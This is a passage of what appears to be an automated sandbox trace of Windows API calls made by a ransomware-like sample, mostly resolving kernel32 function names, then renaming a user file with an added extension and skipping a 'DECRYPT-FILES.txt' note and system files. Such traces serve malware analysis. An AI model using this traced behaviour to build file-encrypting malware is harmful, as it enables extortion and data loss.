(in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.622] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.622] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.622] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.623] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.623] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.623] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.623] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.623] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.623] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.623] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.623] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.623] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.623] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.623] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.623] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.623] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.623] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.623] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.623] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.623] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.623] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.623] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.624] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.624] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.624] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.624] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.624] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.624] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.624] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.624] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.624] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.624] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.624] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.624] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.624] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.624] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.624] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.624] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.624] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.624] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.624] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.625] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.625] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.625] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.625] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.625] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.625] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.625] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.625] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.625] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.625] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.625] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.625] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.625] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.625] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.625] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.625] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.625] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.625] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.625] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.626] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.626] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.626] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.626] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.626] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.626] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.626] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.626] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.626] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.626] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.626] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.626] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.626] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.626] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.626] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.626] lstrlenA (lpString="DELETEATOM") returned 10 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.626] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.626] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.626] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.627] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.627] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.627] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.627] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.627] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.627] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.627] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.627] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.627] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.627] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.627] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.627] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.627] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.627] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.627] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.627] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.627] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.627] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.627] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.628] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.628] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.628] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.628] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.628] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.628] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.628] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.628] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.628] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.628] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.628] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.628] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.628] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.628] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.628] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.628] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.628] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.628] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.628] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.629] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.629] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.629] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.629] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.629] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xw7Ljtxw.gif") returned 58 [0082.629] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xw7Ljtxw.gif.Q5Ty") returned 63 [0082.629] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xw7Ljtxw.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xw7ljtxw.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xw7Ljtxw.gif.Q5Ty" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xw7ljtxw.gif.q5ty"), dwFlags=0x0) returned 1 [0082.630] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.630] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.630] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.630] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x97d69c00, ftCreationTime.dwHighDateTime=0x1d4d4f4, ftLastAccessTime.dwLowDateTime=0x937c7550, ftLastAccessTime.dwHighDateTime=0x1d4d362, ftLastWriteTime.dwLowDateTime=0x937c7550, ftLastWriteTime.dwHighDateTime=0x1d4d362, nFileSizeHigh=0x0, nFileSizeLow=0x17547, dwReserved0=0x0, dwReserved1=0x0, cFileName="zrDg.rtf", cAlternateFileName="")) returned 1 [0082.630] lstrcmpiW (lpString1="zrDg.rtf", lpString2="DECRYPT-FILES.txt") returned 1 [0082.630] lstrcmpiW (lpString1="zrDg.rtf", lpString2="autorun.inf") returned 1 [0082.630] lstrcmpiW (lpString1="zrDg.rtf", lpString2="boot.ini") returned 1 [0082.630] lstrcmpiW (lpString1="zrDg.rtf", lpString2="desktop.ini") returned 1 [0082.631] lstrcmpiW (lpString1="zrDg.rtf", lpString2="ntuser.dat") returned 1 [0082.631] lstrcmpiW (lpString1="zrDg.rtf", lpString2="iconcache.db") returned 1 [0082.631] lstrcmpiW (lpString1="zrDg.rtf", lpString2="bootsect.bak") returned 1 [0082.631] 